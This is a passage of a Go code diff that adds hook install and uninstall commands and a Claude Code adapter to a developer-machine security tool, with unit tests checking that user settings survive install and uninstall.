diff --git a/cmd/stepsecurity-dev-machine-guard/main.go b/cmd/stepsecurity-dev-machine-guard/main.go index 3a6742f..c512f2a 100644 --- a/cmd/stepsecurity-dev-machine-guard/main.go +++ b/cmd/stepsecurity-dev-machine-guard/main.go @@ -1,10 +1,12 @@ package main import ( + "context" "fmt" "os" "runtime" + aiagentscli "github.com/step-security/dev-machine-guard/internal/aiagents/cli" "github.com/step-security/dev-machine-guard/internal/buildinfo" "github.com/step-security/dev-machine-guard/internal/cli" "github.com/step-security/dev-machine-guard/internal/config" @@ -18,6 +20,18 @@ import ( ) func main() { + // Hook hot path. Agents invoke `_hook` on every event and any non-zero + // exit is treated as a hook failure / block — so we MUST exit 0 even on + // malformed args. Skip every line below this branch (CLI parsing, + // executor construction, logger setup) to keep the runtime budget + // realistic; the 15s hook cap has to absorb identity probes and a 5s + // upload, every millisecond here is dead weight. RunHook owns its own + // minimal config.Load (just enough for the upload gate) so this branch + // stays free of the rest of main's setup work. + if len(os.Args) >= 2 && os.Args[1] == "_hook" { + os.Exit(aiagentscli.RunHook(os.Stdin, os.Stdout, os.Stderr, os.Args[2:])) + } + // Load persisted config (~/.stepsecurity/config.json) before parsing CLI config.Load() @@ -159,6 +173,12 @@ func main() { os.Exit(1) } + case "hooks install": + os.Exit(aiagentscli.RunInstall(context.Background(), exec, cfg.HooksAgent, os.Stdout, os.Stderr)) + + case "hooks uninstall": + os.Exit(aiagentscli.RunUninstall(context.Background(), exec, cfg.HooksAgent, os.Stdout, os.Stderr)) + default: // Community mode or auto-detect enterprise switch { diff --git a/go.mod b/go.mod index 951ad13..85525c7 100644 --- a/go.mod +++ b/go.mod @@ -4,4 +4,13 @@ go 1.24 require golang.org/x/sys v0.33.0 -require github.com/google/uuid v1.6.0 +require ( + github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 + github.com/google/uuid v1.6.0 + github.com/pelletier/go-toml/v2 v2.3.1 + github.com/tidwall/gjson v1.18.0 + github.com/tidwall/pretty v1.2.1 + github.com/tidwall/sjson v1.2.5 +) + +require github.com/tidwall/match v1.1.1 // indirect diff --git a/go.sum b/go.sum index d70ecf3..c65ccc5 100644 --- a/go.sum +++ b/go.sum @@ -1,4 +1,18 @@ +github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= +github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/pelletier/go-toml/v2 v2.3.1 h1:MYEvvGnQjeNkRF1qUuGolNtNExTDwct51yp7olPtrEc= +github.com/pelletier/go-toml/v2 v2.3.1/go.mod h1:2gIqNv+qfxSVS7cM2xJQKtLSTLUE9V8t9Stt+h56mCY= +github.com/tidwall/gjson v1.14.2/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= +github.com/tidwall/gjson v1.18.0 h1:FIDeeyB800efLX89e5a8Y0BNH+LOngJyGrIWxG2FKQY= +github.com/tidwall/gjson v1.18.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= +github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= +github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= +github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= +github.com/tidwall/pretty v1.2.1 h1:qjsOFOWWQl+N3RsoF5/ssm1pHmJJwhjlSbZ51I6wMl4= +github.com/tidwall/pretty v1.2.1/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= +github.com/tidwall/sjson v1.2.5 h1:kLy8mja+1c9jlljvWTlSazM7cKDRfJuR/bOJhcY5NcY= +github.com/tidwall/sjson v1.2.5/go.mod h1:Fvgq9kS/6ociJEDnK0Fk1cpYF4FIW6ZF7LAe+6jwd28= golang.org/x/sys v0.33.0 h1:q3i8TbbEz+JRD9ywIRlyRAQbM0qF7hu24q3teo2hbuw= golang.org/x/sys v0.33.0/go.mod h1:BJP2sWEmIv4KK5OTEluFJCKSidICx8ciO85XgH3Ak8k= diff --git a/internal/aiagents/adapter/adapter.go b/internal/aiagents/adapter/adapter.go new file mode 100644 index 0000000..f94fe6e --- /dev/null +++ b/internal/aiagents/adapter/adapter.go @@ -0,0 +1,236 @@ +// Package adapter defines the contract every per-agent integration +// (Claude Code, Codex) implements. +// +// Lifecycle of an Adapter: +// +// - hooks install handler ⇢ Detect, ManagedFiles, Install +// - hooks uninstall handler ⇢ ManagedFiles, Uninstall +// - _hook runtime ⇢ ParseEvent, ShellCommand, DecideResponse +// +// The interface is intentionally trimmed: Restore, Status, +// RestoreOptions, BackupInfo, and HookStatus are absent — `hooks restore` +// and `hooks status` are not in scope. Reintroducing them is a public-API +// change, so adapters should not invent stubs that hint they are coming +// back. +// +// Constructors take the user's home directory and the resolved DMG +// binary path. Adapters compute their own settings file paths (e.g. +// ~/.claude/settings.json, ~/.codex/{hooks.json,config.toml}) from +// home, and embed binaryPath (absolute, symlinks resolved) into the +// hook command they write into settings. Both pieces of state are +// immutable for the lifetime of the adapter. +package adapter + +import ( + "context" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// DetectionResult reports whether the agent is installed locally. +// +// Detection is by executor.LookPath of the agent's CLI binary +// (claude / codex). Settings file presence is NOT a gate — install +// creates the settings file from scratch when absent. +type DetectionResult struct { + // Detected is true iff the agent's CLI binary is on $PATH. + Detected bool + + // BinaryPath is the resolved absolute path returned by LookPath + // when Detected=true; empty otherwise. Diagnostic only — install + // does not invoke the agent binary. + BinaryPath string + + // Notes are user-facing diagnostic strings. Examples: "settings + // file does not exist; install will create it". + Notes []string +} + +// ManagedFile describes one file an adapter mutates. The install / +// uninstall handlers consult this list so they never have to hardcode +// per-agent paths or labels — and the install handler walks it (plus +// CreatedDirs from InstallResult) to chown the full set under root. +type ManagedFile struct { + // Label is the user-facing path with $HOME tildified (e.g. + // "~/.claude/settings.json"). Used in diagnostic output. + Label string + // Path is the absolute filesystem path. + Path string +} + +// InstallResult describes what install actually did. +// +// The install handler walks WrittenFiles ∪ BackupFiles ∪ CreatedDirs +// to chown the full set to the console user under root. Adapters must +// populate all three slices. +type InstallResult struct { + // HooksAdded names the hook events for which a new entry was + // added. Order matches the adapter's SupportedHooks() order. + HooksAdded []event.HookEvent + + // HooksKept names hook events whose entry was already in place + // and untouched (idempotent reinstall). + HooksKept []event.HookEvent + + // WrittenFiles are settings files (and side-effect files such as + // Codex's config.toml) that Install created or rewrote. Absolute + // paths only. Empty when the install was a complete no-op. + WrittenFiles []string + + // BackupFiles are pre-existing files Install copied aside before + // rewriting, named with the .dmg-.bak suffix from + // internal/aiagents/atomicfile. + BackupFiles []string + + // CreatedDirs are parent directories Install mkdir'd. Order is + // shallowest-first so chown can apply parent-before-child without + // a second pass. + CreatedDirs []string + + // Notes are user-facing diagnostic strings. + Notes []string +} + +// UninstallResult describes the side effects of uninstall. +// +// The settings file is never deleted, even when uninstall removes the +// last entry — leaving an empty settings object behind preserves any +// non-hook configuration the user had in there. +type UninstallResult struct { + // HooksRemoved names hook events from which at least one + // DMG-owned entry was removed. Sorted for stable output. + HooksRemoved []event.HookEvent + + // WrittenFiles are settings files Uninstall rewrote. + WrittenFiles []string + + // BackupFiles are pre-existing settings files copied aside before + // rewrite, with the .dmg-.bak suffix. + BackupFiles []string + + // Notes are user-facing diagnostic strings. + Notes []string +} + +// Decision is the agent-agnostic verdict the runtime hands to +// DecideResponse. It carries ONLY the two fields the wire format +// actually needs; the richer event.PolicyDecisionInfo (with code, +// internal detail, would_block, etc.) lives on the event itself. +// +// A zero-value Decision means "deny with no reason" — callers should +// always construct via AllowDecision() or with explicit Allow=true. +// +// Today the runtime NEVER returns Allow=false to the agent: the policy +// evaluator is forced to audit mode. DecideResponse implementations +// must still handle Allow=false correctly because the same code path +// will serve block mode in a future revision. +type Decision struct { + Allow bool + // UserMessage is shown on block; ignored on allow. The fixed + // user-visible deny string is "Blocked by your organization's + // administrator." — UserMessage is the upstream rationale used + // in telemetry, not what the end user sees. + UserMessage string +} + +// AllowDecision is the canonical zero-message allow. +func AllowDecision() Decision { return Decision{Allow: true} } + +// HookResponse is the adapter-agnostic return type from DecideResponse. +// The runtime treats it as opaque and json-marshals it to stdout; the +// concrete shape is the adapter's responsibility and lives inside the +// adapter's own subpackage. This boundary is what lets future adapters +// define their own wire format without bleeding into the hot path or +// any shared type. +type HookResponse any + +// BackupInfo is the value side of (path, timestamp) backup entries. +// Reserved here for future hooks-restore work; not used by current +// install/uninstall but kept on the public API so adding it later +// does not require a fresh type. (Held in this package because +// atomicfile and the install handler share the (path, time) pair.) +type BackupInfo struct { + Path string + Timestamp time.Time +} + +// Adapter is the per-agent integration contract. +// +// Implementations must be safe to construct cheaply (the install +// handler builds one per detected agent) and stateless across method +// calls — adapter state is set at construction time (home dir, binary +// path) and not mutated by methods. Each method receives any per-call +// inputs explicitly so the adapter does not coordinate shared state. +type Adapter interface { + // Name is the canonical agent slug used on the CLI (`--agent + // `), in the `_hook ` runtime invocation, and in the + // event payload. Returns "claude-code" or "codex". + Name() string + + // SupportedHooks returns the agent-defined hook events DMG + // installs entries for. Order is preserved in user-facing + // install diagnostics. Returned slice is owned by the caller. + SupportedHooks() []event.HookEvent + + // ManagedFiles enumerates every file this adapter mutates, + // computed from the home directory baked in at construction + // time. Used by the install handler for the chown sweep under + // root and by uninstall to know what to inspect. + ManagedFiles() []ManagedFile + + // Detect reports whether the agent is installed on this machine. + // Implementations call exec.LookPath on the agent's CLI binary; + // any LookPath error becomes Detected=false (no error return — + // detection is a query, not an operation). + Detect(ctx context.Context, exec executor.Executor) (DetectionResult, error) + + // Install writes hook entries into the agent's settings file(s). + // Idempotent: when the entries are already present and unchanged, + // returns empty WrittenFiles and BackupFiles and performs no + // writes. + // + // Multi-file adapters (Codex writes both hooks.json and + // config.toml) MUST validate-and-encode every output buffer + // before writing the first one — a half-applied install leaves + // the agent in a worse state than no install. + Install(ctx context.Context) (InstallResult, error) + + // Uninstall removes DMG-owned hook entries from the agent's + // settings. Match criterion: the entry's command field matches + // the per-adapter pattern derived from the resolved DMG binary + // path. Third-party hooks from other tools are intentionally not + // matched. + // + // The settings file is never deleted, even if uninstall empties + // it of hooks. + Uninstall(ctx context.Context) (UninstallResult, error) + + // ParseEvent decodes a payload that the agent piped to + // `_hook ` on stdin. The runtime reads stdin + // (capped at 5 MiB by hook/stdin.go), and passes the hookType + // from the CLI args plus the raw bytes here. The CLI arg is the + // canonical hookType — payload mismatches are recorded as + // event.ErrorInfo, not promoted to the wire field. + // + // Errors are returned verbatim. The runtime's fail-open contract + // (cli/hook.go) means a ParseEvent error becomes an allow + // response on stdout, with the error logged to errlog. + ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) + + // ShellCommand extracts the redacted shell command (and its + // working directory) from a parsed event, when the underlying + // tool is a shell. Adapters whose agents have no shell tool + // return ok=false. The returned command is already redacted. + ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) + + // DecideResponse renders a Decision into the agent's expected + // stdout response shape. The runtime json-marshals the result + // and writes it to stdout verbatim. + // + // The runtime always passes AllowDecision() today. The Allow=false + // path is exercised only by adapter unit tests until block mode + // ships. + DecideResponse(ev *event.Event, d Decision) HookResponse +} diff --git a/internal/aiagents/adapter/adapter_test.go b/internal/aiagents/adapter/adapter_test.go new file mode 100644 index 0000000..06127a9 --- /dev/null +++ b/internal/aiagents/adapter/adapter_test.go @@ -0,0 +1,93 @@ +package adapter_test + +import ( + "context" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// stubAdapter is the minimal type that satisfies adapter.Adapter. The +// var assignment below is a compile-time assertion that the interface +// is implementable as currently defined — if a method is added or its +// signature changes, this file fails to build, surfacing the breakage +// to every implementer at once. +type stubAdapter struct{} + +func (stubAdapter) Name() string { return "stub" } +func (stubAdapter) SupportedHooks() []event.HookEvent { return nil } +func (stubAdapter) ManagedFiles() []adapter.ManagedFile { + return nil +} +func (stubAdapter) Detect(context.Context, executor.Executor) (adapter.DetectionResult, error) { + return adapter.DetectionResult{}, nil +} +func (stubAdapter) Install(context.Context) (adapter.InstallResult, error) { + return adapter.InstallResult{}, nil +} +func (stubAdapter) Uninstall(context.Context) (adapter.UninstallResult, error) { + return adapter.UninstallResult{}, nil +} +func (stubAdapter) ParseEvent(context.Context, event.HookEvent, []byte) (*event.Event, error) { + return nil, nil +} +func (stubAdapter) ShellCommand(*event.Event) (string, string, bool) { + return "", "", false +} +func (stubAdapter) DecideResponse(*event.Event, adapter.Decision) adapter.HookResponse { + return nil +} + +var _ adapter.Adapter = stubAdapter{} + +func TestAllowDecisionIsAllow(t *testing.T) { + d := adapter.AllowDecision() + if !d.Allow { + t.Error("AllowDecision().Allow must be true") + } + if d.UserMessage != "" { + t.Errorf("AllowDecision().UserMessage = %q, want empty", d.UserMessage) + } +} + +func TestZeroValueResultsAreUsable(t *testing.T) { + // The install/uninstall handlers iterate the result slices; a + // zero value must be safe to iterate without nil-check ceremony + // at the call site. + var ir adapter.InstallResult + for range ir.HooksAdded { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.WrittenFiles { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.BackupFiles { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.CreatedDirs { + t.Fatal("zero InstallResult should iterate zero times") + } + + var ur adapter.UninstallResult + for range ur.HooksRemoved { + t.Fatal("zero UninstallResult should iterate zero times") + } + for range ur.WrittenFiles { + t.Fatal("zero UninstallResult should iterate zero times") + } + for range ur.BackupFiles { + t.Fatal("zero UninstallResult should iterate zero times") + } +} + +func TestDetectionResultZeroValueIsNotDetected(t *testing.T) { + var dr adapter.DetectionResult + if dr.Detected { + t.Error("zero DetectionResult.Detected should be false") + } + if dr.BinaryPath != "" { + t.Errorf("zero DetectionResult.BinaryPath = %q, want empty", dr.BinaryPath) + } +} diff --git a/internal/aiagents/adapter/claudecode/adapter.go b/internal/aiagents/adapter/claudecode/adapter.go new file mode 100644 index 0000000..ff020fd --- /dev/null +++ b/internal/aiagents/adapter/claudecode/adapter.go @@ -0,0 +1,197 @@ +// Package claudecode implements the Adapter interface for Claude Code. +// +// Detection is by `executor.LookPath("claude")`. Settings live at +// /.claude/settings.json. The hook command DMG writes is +// ` _hook claude-code ` where binaryPath is the +// absolute, symlink-resolved DMG binary path resolved at install time. +// +// Restore + Status are intentionally absent — see the package-level +// doc on adapter.Adapter for why the interface is trimmed. +package claudecode + +import ( + "context" + "fmt" + "path/filepath" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// AgentName is the identifier DMG uses for Claude Code on the wire and +// in the `_hook ` invocation. Adapter-private; the runtime +// never compares against it. +const AgentName = "claude-code" + +// AgentBinary is the name `executor.LookPath` searches for during +// detection. Adapter-private. +const AgentBinary = "claude" + +// Adapter implements adapter.Adapter for Claude Code. +// +// State is set once at construction and never mutated. settingsPath is +// derived from home; binaryPath is the absolute DMG binary path the +// install handler resolved via internal/aiagents/cli.Resolve. +type Adapter struct { + settingsPath string + binaryPath string +} + +// New constructs an Adapter for the given user home and resolved DMG +// binary path. Both arguments must be absolute; behavior with relative +// paths is undefined. +func New(home, binaryPath string) *Adapter { + return &Adapter{ + settingsPath: filepath.Join(home, ".claude", "settings.json"), + binaryPath: binaryPath, + } +} + +// Name returns the adapter agent name. +func (a *Adapter) Name() string { return AgentName } + +// ManagedFiles reports the single Claude settings file the adapter +// mutates. Used by the install handler for the chown sweep under root. +func (a *Adapter) ManagedFiles() []adapter.ManagedFile { + return []adapter.ManagedFile{{Label: "~/.claude/settings.json", Path: a.settingsPath}} +} + +// Detect reports whether the Claude Code CLI is on $PATH. Settings +// file presence is NOT a gate — install creates the file from scratch +// when absent. +func (a *Adapter) Detect(ctx context.Context, exec executor.Executor) (adapter.DetectionResult, error) { + res := adapter.DetectionResult{} + bin, err := exec.LookPath(AgentBinary) + if err != nil { + // LookPath errors mean "not on $PATH" — that's a query result, + // not an operational failure. + res.Notes = append(res.Notes, "claude CLI not found on $PATH") + return res, nil + } + res.Detected = true + res.BinaryPath = bin + return res, nil +} + +// Install adds DMG-owned hooks for every supported hook event. +// +// Idempotent: when every entry is already in place, no file is written +// and HooksKept enumerates every event. When any entry is added or +// refreshed, the entire settings file is pretty-printed to canonical +// 2-space indent — formatting in keys we did not touch is normalized +// once on edit, which is an acceptable trade-off for human readability +// of the result. +func (a *Adapter) Install(ctx context.Context) (adapter.InstallResult, error) { + doc, err := loadSettings(a.settingsPath) + if err != nil { + return adapter.InstallResult{}, err + } + res := adapter.InstallResult{} + for _, ht := range supportedHookEvents { + if doc.upsertHook(ht, a.commandFor(ht)) { + res.HooksAdded = append(res.HooksAdded, ht) + } else { + res.HooksKept = append(res.HooksKept, ht) + } + } + wr, err := writeAtomic(a.settingsPath, doc) + if err != nil { + return res, err + } + if wr != nil { + res.WrittenFiles = append(res.WrittenFiles, wr.Path) + if wr.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, wr.BackupPath) + } + res.CreatedDirs = append(res.CreatedDirs, wr.CreatedDirs...) + } + return res, nil +} + +// Uninstall removes only DMG-owned hook entries. +// The settings file is preserved even when uninstall removes the last +// hook — leaving an empty {} (or whatever non-hook keys remain) keeps +// any user customization intact. +func (a *Adapter) Uninstall(ctx context.Context) (adapter.UninstallResult, error) { + doc, err := loadSettings(a.settingsPath) + if err != nil { + return adapter.UninstallResult{}, err + } + res := adapter.UninstallResult{} + res.HooksRemoved = doc.removeManagedHooks(a.binaryPath) + if len(res.HooksRemoved) == 0 { + res.Notes = append(res.Notes, "no DMG-owned hook entries found") + return res, nil + } + wr, err := writeAtomic(a.settingsPath, doc) + if err != nil { + return res, fmt.Errorf("claude uninstall: %w", err) + } + if wr != nil { + res.WrittenFiles = append(res.WrittenFiles, wr.Path) + if wr.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, wr.BackupPath) + } + } + return res, nil +} + +// commandFor renders the literal command string DMG writes into the +// settings entry for hookEvent. Format: +// +// _hook claude-code +// +// The binary path is absolute and symlink-resolved at install time; +// see internal/aiagents/cli/selfpath.go. +func (a *Adapter) commandFor(hookEvent event.HookEvent) string { + return a.binaryPath + " _hook " + AgentName + " " + string(hookEvent) +} + +// allowResponse is the Claude Code wire-format for "let the agent +// proceed." `{"continue": true, "suppressOutput": true}` is the +// canonical allow shape on every hook event. +type allowResponse struct { + Continue bool `json:"continue"` + SuppressOutput bool `json:"suppressOutput,omitempty"` +} + +// preToolUseBlockResponse is the spec-compliant PreToolUse block shape. +// Per https://code.claude.com/docs/en/hooks.md, blocking a tool call +// MUST go through hookSpecificOutput.permissionDecision; the legacy +// top-level `decision: "block"` is deprecated. We never emit +// `continue: false` — that field halts the agent entirely and is +// scope-mismatched for "block this single tool call." +type preToolUseBlockResponse struct { + SuppressOutput bool `json:"suppressOutput,omitempty"` + HookSpecificOutput map[string]any `json:"hookSpecificOutput"` +} + +// DecideResponse renders a generic Decision into Claude Code's wire +// format. Routing is hook-type-aware: only PreToolUse has a defined +// block path today (the policy stage is filtered to PreToolUse + Bash). +// Every other hook event renders the generic allow shape on both +// allow and (defensively) on block, so a stray block decision can +// never accidentally halt the agent. +func (a *Adapter) DecideResponse(ev *event.Event, d adapter.Decision) adapter.HookResponse { + if d.Allow || ev == nil { + return allowResponse{Continue: true, SuppressOutput: true} + } + switch ev.HookEvent { + case event.HookPreToolUse: + msg := d.UserMessage + if msg == "" { + msg = "Blocked by your organization's administrator." + } + return preToolUseBlockResponse{ + SuppressOutput: true, + HookSpecificOutput: map[string]any{ + "hookEventName": "PreToolUse", + "permissionDecision": "deny", + "permissionDecisionReason": msg, + }, + } + default: + return allowResponse{Continue: true, SuppressOutput: true} + } +} diff --git a/internal/aiagents/adapter/claudecode/adapter_test.go b/internal/aiagents/adapter/claudecode/adapter_test.go new file mode 100644 index 0000000..70cb1f6 --- /dev/null +++ b/internal/aiagents/adapter/claudecode/adapter_test.go @@ -0,0 +1,805 @@ +package claudecode + +import ( + "bytes" + "context" + "encoding/json" + "os" + "path/filepath" + "slices" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// testBinary is the absolute DMG binary path tests pass to New(). The +// uninstall matcher (managedCmdRE) is path-token-agnostic, so the +// specific value just needs to satisfy `(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`. +const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +// newHomeWithSettings creates a tempdir-rooted ~/.claude/settings.json +// containing body and returns the home dir. The adapter under test +// computes its own settings path from home, so callers do not need to +// know the layout. +func newHomeWithSettings(t *testing.T, body string) string { + t.Helper() + home := t.TempDir() + dir := filepath.Join(home, ".claude") + if err := os.MkdirAll(dir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(dir, "settings.json"), []byte(body), 0o600); err != nil { + t.Fatal(err) + } + return home +} + +func settingsPath(home string) string { + return filepath.Join(home, ".claude", "settings.json") +} + +func mustParse(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + var out map[string]any + if err := json.Unmarshal(b, &out); err != nil { + t.Fatalf("settings JSON: %v", err) + } + return out +} + +func TestInstallPreservesUserHooks(t *testing.T) { + body := `{ + "theme": "dark", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "echo user"}]}, + {"matcher": "Bash", "hooks": [{"type": "command", "command": "echo bash-only"}]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if len(res.BackupFiles) == 0 { + t.Error("expected backup file") + } + if len(res.WrittenFiles) == 0 { + t.Error("expected written file") + } + + got := mustParse(t, settingsPath(home)) + hooks := got["hooks"].(map[string]any) + pre := hooks["PreToolUse"].([]any) + + // Find every command across the matchers; the user's must remain. + var commands []string + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + commands = append(commands, hm["command"].(string)) + } + } + joined := strings.Join(commands, "\n") + if !strings.Contains(joined, "echo user") { + t.Errorf("user hook lost; got %q", joined) + } + if !strings.Contains(joined, "echo bash-only") { + t.Errorf("matcher-specific user hook lost; got %q", joined) + } + if !strings.Contains(joined, "stepsecurity-dev-machine-guard") { + t.Errorf("DMG hook missing; got %q", joined) + } + + // Theme key must survive. + if got["theme"] != "dark" { + t.Errorf("unrelated key lost") + } +} + +func TestUninstallRemovesOnlyManagedHooks(t *testing.T) { + // User hooks include lookalikes that the regex match must NOT touch: + // a tool whose name starts with the same prefix but isn't a separate + // word; a hyphenated suffix; an absolute path that is NOT the DMG + // binary; and an absolute-path non-DMG entry, all intentionally + // not matched. + body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [ + {"type": "command", "command": "stepsecurity-dev-machine-guardctl status"}, + {"type": "command", "command": "stepsecurity-dev-machine-guard-foo run"}, + {"type": "command", "command": "/usr/local/bin/other-tool _hook claude-code PreToolUse"}, + {"type": "command", "command": "echo user-other"} + ]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + res, err := a.Uninstall(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(res.HooksRemoved) == 0 { + t.Fatal("expected at least one removal") + } + got := mustParse(t, settingsPath(home)) + hooks, _ := got["hooks"].(map[string]any) + if hooks == nil { + t.Fatal("hooks key removed despite remaining user entries") + } + pre := hooks["PreToolUse"].([]any) + survivors := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd, _ := hm["command"].(string) + survivors = append(survivors, cmd) + if isManagedCommand(cmd) { + t.Errorf("managed command survived uninstall: %q", cmd) + } + } + } + // Each lookalike user hook must remain. + for _, want := range []string{ + "stepsecurity-dev-machine-guardctl status", + "stepsecurity-dev-machine-guard-foo run", + "/usr/local/bin/other-tool _hook claude-code PreToolUse", + "echo user-other", + } { + if !slices.Contains(survivors, want) { + t.Errorf("lookalike user hook %q removed; survivors=%v", want, survivors) + } + } +} + +// rootKeyOrder returns the top-level JSON object keys of path in the +// order they appear in the file. We tokenize via json.Decoder so the +// test does not depend on the same parser the adapter uses. +func rootKeyOrder(t *testing.T, path string) []string { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + dec := json.NewDecoder(strings.NewReader(string(b))) + tok, err := dec.Token() + if err != nil || tok != json.Delim('{') { + t.Fatalf("expected root '{', got %v err %v", tok, err) + } + var keys []string + for dec.More() { + k, err := dec.Token() + if err != nil { + t.Fatal(err) + } + keys = append(keys, k.(string)) + var raw json.RawMessage + if err := dec.Decode(&raw); err != nil { + t.Fatal(err) + } + } + return keys +} + +func TestInstallPreservesRootKeyOrder(t *testing.T) { + // `z`, `hooks`, `a` is in non-lexical order; encoding/json + map[string]any + // would alphabetize it to `a`, `hooks`, `z`. + body := `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + got := rootKeyOrder(t, settingsPath(home)) + want := []string{"z", "hooks", "a"} + if len(got) != len(want) { + t.Fatalf("root keys: got %v, want %v", got, want) + } + for i := range want { + if got[i] != want[i] { + t.Errorf("root key order: got %v, want %v", got, want) + break + } + } +} + +func TestInstallPreservesUserHookEntryKeyOrder(t *testing.T) { + // User wrote keys as `timeout`, `type`, `command`. encoding/json on + // map[string]any would re-emit them as `command`, `timeout`, `type`. + body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + b, _ := os.ReadFile(settingsPath(home)) + out := string(b) + // Find the user hook entry by command and verify timeout precedes + // type precedes command — the user's original order. + userIdx := strings.Index(out, `"echo user"`) + if userIdx < 0 { + t.Fatalf("user hook not found in output: %s", out) + } + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + if entryStart < 0 || entryEnd < 0 { + t.Fatalf("could not locate user entry: %s", out) + } + entry := out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost; entry: %s", entry) + } +} + +func TestUninstallLeavesUnrelatedKeysUntouched(t *testing.T) { + body := `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatalf("Uninstall: %v", err) + } + got := rootKeyOrder(t, settingsPath(home)) + zIdx, aIdx := -1, -1 + for i, k := range got { + if k == "z" { + zIdx = i + } + if k == "a" { + aIdx = i + } + } + if zIdx < 0 || aIdx < 0 || zIdx >= aIdx { + t.Errorf("expected z before a in %v", got) + } + // The user hook must have survived. + b, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(b), "echo user") { + t.Errorf("user hook lost on uninstall: %s", b) + } +} + +func TestInstallPreservesUnrelatedRootKeys(t *testing.T) { + body := "{\n\t\"theme\": \"dark\",\n\t\"hooks\": {}\n}\n" + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + b, _ := os.ReadFile(settingsPath(home)) + out := string(b) + if !strings.Contains(out, `"theme": "dark"`) { + t.Errorf("unrelated theme key/value was lost:\n%s", out) + } +} + +func TestInstallNoOpDoesNotRewriteSettings(t *testing.T) { + home := newHomeWithSettings(t, `{"theme":"dark"}`) + a := New(home, testBinary) + // First install brings file into desired state. + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("first install: %v", err) + } + before, _ := os.ReadFile(settingsPath(home)) + matches, _ := filepath.Glob(settingsPath(home) + ".dmg-*.bak") + beforeBackups := len(matches) + // Second install should be a no-op. + res, err := a.Install(context.Background()) + if err != nil { 